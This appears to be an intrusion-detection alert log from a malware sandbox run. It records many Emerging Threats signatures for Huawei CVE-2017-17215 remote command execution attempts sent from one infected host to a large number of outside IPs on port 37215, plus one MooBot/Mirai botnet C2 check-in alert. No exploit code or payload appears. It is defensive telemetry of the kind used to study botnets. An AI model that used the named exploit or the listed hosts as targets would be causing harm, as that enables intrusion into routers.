                                                    07/10/24-08:26:31.074036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617037215192.168.2.14157.83.238.220
                                                    07/10/24-08:27:30.500582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033837215192.168.2.14157.87.68.180
                                                    07/10/24-08:26:49.910333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552437215192.168.2.14197.77.125.124
                                                    07/10/24-08:26:28.801759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980637215192.168.2.14212.168.131.43
                                                    07/10/24-08:27:13.921324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334637215192.168.2.14197.83.176.158
                                                    07/10/24-08:26:11.168710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306237215192.168.2.14157.255.193.204
                                                    07/10/24-08:26:25.486596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435637215192.168.2.14197.110.16.247
                                                    07/10/24-08:26:45.651958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753837215192.168.2.14157.68.188.177
                                                    07/10/24-08:27:08.448133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877437215192.168.2.14197.52.206.137
                                                    07/10/24-08:26:38.636567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850837215192.168.2.1474.110.0.101
                                                    07/10/24-08:26:38.527687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827637215192.168.2.1441.184.189.207
                                                    07/10/24-08:27:30.505030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475437215192.168.2.14197.129.244.146
                                                    07/10/24-08:26:15.864839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.14197.250.21.25
                                                    07/10/24-08:26:23.282247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975037215192.168.2.1441.163.134.179
                                                    07/10/24-08:26:57.662909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214837215192.168.2.14157.151.86.71
                                                    07/10/24-08:27:08.398717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693637215192.168.2.14148.76.221.166
                                                    07/10/24-08:27:11.557804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461437215192.168.2.14157.156.80.44
                                                    07/10/24-08:26:36.399837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947237215192.168.2.14132.171.204.181
                                                    07/10/24-08:26:11.557053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5289837215192.168.2.1457.42.140.234
                                                    07/10/24-08:27:05.176375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764037215192.168.2.14152.247.81.160
                                                    07/10/24-08:27:17.078859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054437215192.168.2.1477.155.76.91
                                                    07/10/24-08:26:20.117680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275637215192.168.2.1441.22.27.42
                                                    07/10/24-08:26:28.918557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560637215192.168.2.14197.119.220.72
                                                    07/10/24-08:26:43.530695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522837215192.168.2.14157.74.211.191
                                                    07/10/24-08:26:43.826364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692237215192.168.2.14197.68.244.95
                                                    07/10/24-08:27:28.146093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838037215192.168.2.14197.219.186.9
                                                    07/10/24-08:26:47.974883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477437215192.168.2.14197.83.173.83
                                                    07/10/24-08:27:22.913704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650237215192.168.2.1439.146.153.149
                                                    07/10/24-08:26:13.845095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035237215192.168.2.14157.239.140.222
                                                    07/10/24-08:27:08.339204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201837215192.168.2.1441.255.178.107
                                                    07/10/24-08:26:25.484683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557437215192.168.2.14157.83.22.27
                                                    07/10/24-08:27:14.853963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981837215192.168.2.14197.207.43.24
                                                    07/10/24-08:26:53.190112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284637215192.168.2.14157.4.189.47
                                                    07/10/24-08:26:29.856939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834637215192.168.2.14157.190.198.52
                                                    07/10/24-08:26:53.179489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945837215192.168.2.14197.209.32.22
                                                    07/10/24-08:27:05.212811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706837215192.168.2.1441.227.31.170
                                                    07/10/24-08:27:31.485057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458637215192.168.2.14121.13.105.160
                                                    07/10/24-08:26:28.630891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151237215192.168.2.14157.199.181.216
                                                    07/10/24-08:26:28.741388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898237215192.168.2.1441.13.50.46
                                                    07/10/24-08:26:34.184819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579637215192.168.2.14197.222.163.22
                                                    07/10/24-08:26:47.824141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804237215192.168.2.14207.6.241.219
                                                    07/10/24-08:26:15.838617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085037215192.168.2.14185.155.118.42
                                                    07/10/24-08:26:36.360120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816037215192.168.2.1459.251.88.8
                                                    07/10/24-08:26:41.381541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330437215192.168.2.14210.137.76.20
                                                    07/10/24-08:26:52.060126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921837215192.168.2.14197.4.96.139
                                                    07/10/24-08:27:05.182462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266837215192.168.2.1441.59.212.69
                                                    07/10/24-08:26:38.662636TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)519725976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:41.325591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697437215192.168.2.1414.228.35.126
                                                    07/10/24-08:27:20.516215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3461637215192.168.2.14157.114.180.49
                                                    07/10/24-08:26:11.155522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801437215192.168.2.1489.92.141.49
                                                    07/10/24-08:26:28.895682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664237215192.168.2.14157.233.195.45
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778237215192.168.2.14197.186.104.3
                                                    07/10/24-08:27:08.406759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053037215192.168.2.14197.133.100.229
                                                    07/10/24-08:27:32.614916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700237215192.168.2.1443.73.72.116
                                                    07/10/24-08:27:02.908970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600437215192.168.2.14197.102.135.63
                                                    07/10/24-08:26:26.600322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4945837215192.168.2.14216.6.0.90
                                                    07/10/24-08:26:43.695229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686837215192.168.2.14197.144.87.81
                                                    07/10/24-08:27:05.153820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.14197.199.46.74
                                                    07/10/24-08:26:13.767768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538837215192.168.2.1441.225.31.25
                                                    07/10/24-08:27:28.177023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743037215192.168.2.1441.172.101.227
                                                    07/10/24-08:26:23.284059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769437215192.168.2.14197.232.32.151
                                                    07/10/24-08:26:23.286838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295437215192.168.2.14197.73.48.197
                                                    07/10/24-08:26:43.688834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688237215192.168.2.14197.126.130.97
                                                    07/10/24-08:27:02.928138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089237215192.168.2.14197.176.112.114
                                                    07/10/24-08:27:23.802068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437837215192.168.2.1441.238.51.133
                                                    07/10/24-08:26:28.912225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710637215192.168.2.1441.16.188.66
                                                    07/10/24-08:26:36.389134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227837215192.168.2.14197.40.21.159
                                                    07/10/24-08:26:49.834879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593037215192.168.2.1441.47.193.211
                                                    07/10/24-08:26:26.619862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040237215192.168.2.1441.85.40.104
                                                    07/10/24-08:26:53.185789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255037215192.168.2.14197.195.79.104
                                                    07/10/24-08:26:59.841961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875037215192.168.2.14197.12.133.128
                                                    07/10/24-08:27:28.115496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424437215192.168.2.14143.32.154.61
                                                    07/10/24-08:26:26.432231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658037215192.168.2.1441.190.102.202
                                                    07/10/24-08:27:32.580487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972637215192.168.2.14157.44.231.116
                                                    07/10/24-08:26:59.544166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062237215192.168.2.14197.133.184.153
                                                    07/10/24-08:26:53.196604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142237215192.168.2.14197.96.243.241
                                                    07/10/24-08:26:59.864832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919437215192.168.2.1441.15.95.226
                                                    07/10/24-08:26:49.836491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387837215192.168.2.14220.49.205.209
                                                    07/10/24-08:26:59.771211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065237215192.168.2.1441.255.213.211
                                                    07/10/24-08:26:28.728231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930637215192.168.2.14157.153.164.86
                                                    07/10/24-08:26:41.422305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639637215192.168.2.149.102.111.167
                                                    07/10/24-08:27:23.864190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311237215192.168.2.14197.131.15.31
                                                    07/10/24-08:26:43.821479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589037215192.168.2.14157.168.37.128
                                                    07/10/24-08:26:13.647061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080837215192.168.2.1441.136.97.20
                                                    07/10/24-08:26:34.197956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191837215192.168.2.14157.249.33.15
                                                    07/10/24-08:27:14.885160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472837215192.168.2.14197.20.25.14
                                                    07/10/24-08:27:22.784576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922237215192.168.2.14119.135.59.95
                                                    07/10/24-08:26:13.837705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652237215192.168.2.1441.30.59.94
                                                    07/10/24-08:26:45.633431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874437215192.168.2.1441.22.205.238
                                                    07/10/24-08:27:30.515312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3796637215192.168.2.1467.57.50.70
                                                    07/10/24-08:26:20.173422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152037215192.168.2.1441.81.144.208
                                                    07/10/24-08:27:28.162880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792837215192.168.2.14165.147.112.207
                                                    07/10/24-08:26:11.558206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910037215192.168.2.14157.60.86.29
                                                    07/10/24-08:27:08.392064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704437215192.168.2.1441.197.111.112
                                                    07/10/24-08:27:30.554316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212837215192.168.2.1441.135.47.170
                                                    07/10/24-08:27:23.901569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481837215192.168.2.1441.201.232.166
                                                    07/10/24-08:26:45.666714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671037215192.168.2.1442.36.216.243
                                                    07/10/24-08:26:42.168081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617637215192.168.2.1441.140.0.215
                                                    07/10/24-08:26:28.736673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450237215192.168.2.14157.212.132.237
                                                    07/10/24-08:27:14.856517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755237215192.168.2.14157.156.205.2
                                                    07/10/24-08:27:27.175136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277437215192.168.2.14108.196.199.19
                                                    07/10/24-08:26:52.011560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5218637215192.168.2.14157.98.248.69
                                                    07/10/24-08:27:13.836090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079437215192.168.2.14197.206.128.130
                                                    07/10/24-08:27:14.003131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692237215192.168.2.1434.63.40.144
                                                    07/10/24-08:27:30.472766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337837215192.168.2.1441.250.243.125
                                                    07/10/24-08:27:14.853796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708037215192.168.2.14197.6.155.107
                                                    07/10/24-08:26:29.817860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832237215192.168.2.14157.142.7.213
                                                    07/10/24-08:27:33.818731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207237215192.168.2.14157.236.24.169
                                                    07/10/24-08:26:45.658407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778837215192.168.2.14197.5.238.173
                                                    07/10/24-08:27:14.898333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377837215192.168.2.1441.128.62.230
                                                    07/10/24-08:27:17.078951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380037215192.168.2.14157.110.209.56
                                                    07/10/24-08:26:51.950899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587437215192.168.2.14197.87.167.58
                                                    07/10/24-08:26:31.053236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493037215192.168.2.14197.34.19.245
                                                    07/10/24-08:26:29.790374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4245237215192.168.2.1441.183.51.51
                                                    07/10/24-08:26:22.222515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874437215192.168.2.14197.222.241.115
                                                    07/10/24-08:27:34.142714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314237215192.168.2.1441.240.230.95
                                                    07/10/24-08:26:59.577459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760237215192.168.2.1441.204.139.102
                                                    07/10/24-08:27:02.968527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227037215192.168.2.14125.94.143.72
                                                    07/10/24-08:26:41.406016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918037215192.168.2.1480.20.4.144
                                                    07/10/24-08:26:20.098304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614037215192.168.2.14197.252.103.164
                                                    07/10/24-08:26:22.294435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854837215192.168.2.14157.67.196.153
                                                    07/10/24-08:27:33.945204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455637215192.168.2.1441.87.131.122
                                                    07/10/24-08:26:59.822867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812437215192.168.2.1441.89.63.47
                                                    07/10/24-08:27:32.567631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862637215192.168.2.1441.104.107.55
                                                    07/10/24-08:26:57.619988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392037215192.168.2.1441.81.162.70
                                                    07/10/24-08:27:31.565038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4015837215192.168.2.14197.74.72.5
                                                    07/10/24-08:26:25.518059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.1441.226.124.220
                                                    07/10/24-08:26:13.832527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775837215192.168.2.1495.40.15.152
                                                    07/10/24-08:26:43.849597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659037215192.168.2.14157.158.105.27
                                                    07/10/24-08:26:41.603089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688237215192.168.2.14168.47.174.82
                                                    07/10/24-08:27:08.326825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455237215192.168.2.14157.210.4.7
                                                    07/10/24-08:27:13.815716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834237215192.168.2.14157.237.197.185
                                                    07/10/24-08:27:28.180841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771637215192.168.2.14157.13.138.233
                                                    07/10/24-08:27:22.856390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686037215192.168.2.1441.244.158.222
                                                    07/10/24-08:26:59.831148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3320037215192.168.2.14157.239.33.196
                                                    07/10/24-08:27:22.835700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794637215192.168.2.1441.11.222.148
                                                    07/10/24-08:26:49.822276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735437215192.168.2.14157.228.235.44
                                                    07/10/24-08:26:55.302705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215637215192.168.2.1453.173.159.114
                                                    07/10/24-08:27:27.141072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395637215192.168.2.1441.35.3.79
                                                    07/10/24-08:26:33.249834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820437215192.168.2.1441.229.109.34
                                                    07/10/24-08:27:05.156857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635637215192.168.2.1484.203.147.63
                                                    07/10/24-08:27:30.489960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237837215192.168.2.1441.28.93.126
                                                    07/10/24-08:27:22.571545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293237215192.168.2.14157.154.246.111
                                                    07/10/24-08:27:02.985576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771437215192.168.2.14197.63.24.146
                                                    07/10/24-08:27:32.532227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3604637215192.168.2.1441.53.197.77
                                                    07/10/24-08:26:25.438219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585437215192.168.2.14197.7.64.144
                                                    07/10/24-08:26:48.031000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670637215192.168.2.1470.88.202.47
                                                    07/10/24-08:27:05.096875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292237215192.168.2.1441.41.67.51
                                                    07/10/24-08:26:42.374424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757637215192.168.2.1441.0.115.110
                                                    07/10/24-08:26:43.522484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118237215192.168.2.14197.134.124.36
                                                    07/10/24-08:27:11.501102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124837215192.168.2.14197.230.27.96
                                                    07/10/24-08:27:22.853390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058637215192.168.2.14197.31.221.105
                                                    07/10/24-08:27:31.475226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417037215192.168.2.14120.9.190.141
                                                    07/10/24-08:26:26.603231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022437215192.168.2.14157.99.6.79
                                                    07/10/24-08:27:31.534689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405037215192.168.2.1480.126.106.83
                                                    07/10/24-08:27:05.139248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061437215192.168.2.14197.147.3.165
                                                    07/10/24-08:26:13.835893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5710837215192.168.2.14150.129.41.142
                                                    07/10/24-08:26:52.062166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214237215192.168.2.1448.2.41.112
                                                    07/10/24-08:26:11.165581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113637215192.168.2.1474.101.176.184
                                                    07/10/24-08:27:27.058367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731437215192.168.2.14197.89.123.154
                                                    07/10/24-08:26:57.593962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438037215192.168.2.1441.30.63.83
                                                    07/10/24-08:26:36.342086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667837215192.168.2.14173.64.83.167
                                                    07/10/24-08:26:29.841336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595437215192.168.2.14157.220.247.189
                                                    07/10/24-08:26:59.883274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4871037215192.168.2.14197.219.115.237
                                                    07/10/24-08:26:45.668696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685437215192.168.2.14197.81.175.151
                                                    07/10/24-08:26:38.536872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099037215192.168.2.14157.113.47.94
                                                    07/10/24-08:26:41.555583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948437215192.168.2.14197.45.141.38
                                                    07/10/24-08:26:29.805912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899237215192.168.2.14157.237.208.80
                                                    07/10/24-08:26:55.278006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305437215192.168.2.14157.113.231.103
                                                    07/10/24-08:26:38.579889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055837215192.168.2.1459.1.70.62
                                                    07/10/24-08:26:13.664238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595237215192.168.2.1441.169.70.119
                                                    07/10/24-08:26:11.486385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942637215192.168.2.14197.99.215.32
                                                    07/10/24-08:26:29.865675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547837215192.168.2.1441.144.179.206
                                                    07/10/24-08:26:18.015608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770237215192.168.2.14110.56.71.160
                                                    07/10/24-08:27:05.122105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681237215192.168.2.14157.253.247.26
                                                    07/10/24-08:26:20.187886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854037215192.168.2.14222.222.146.30
                                                    07/10/24-08:26:25.456232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528237215192.168.2.1441.12.227.193
                                                    07/10/24-08:26:20.179402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721437215192.168.2.14111.245.142.10
                                                    07/10/24-08:27:11.523000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030637215192.168.2.1441.19.189.116
                                                    07/10/24-08:26:22.285937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521237215192.168.2.14197.136.152.186
                                                    07/10/24-08:26:55.364667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971437215192.168.2.1449.149.35.40
                                                    07/10/24-08:27:22.535302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935437215192.168.2.14157.223.14.198
                                                    07/10/24-08:26:42.374424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925637215192.168.2.14197.231.215.99
                                                    07/10/24-08:26:43.784447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555437215192.168.2.1441.1.242.106
                                                    07/10/24-08:27:32.591904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751837215192.168.2.14157.58.41.245
                                                    07/10/24-08:27:03.044130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852437215192.168.2.14157.155.98.84
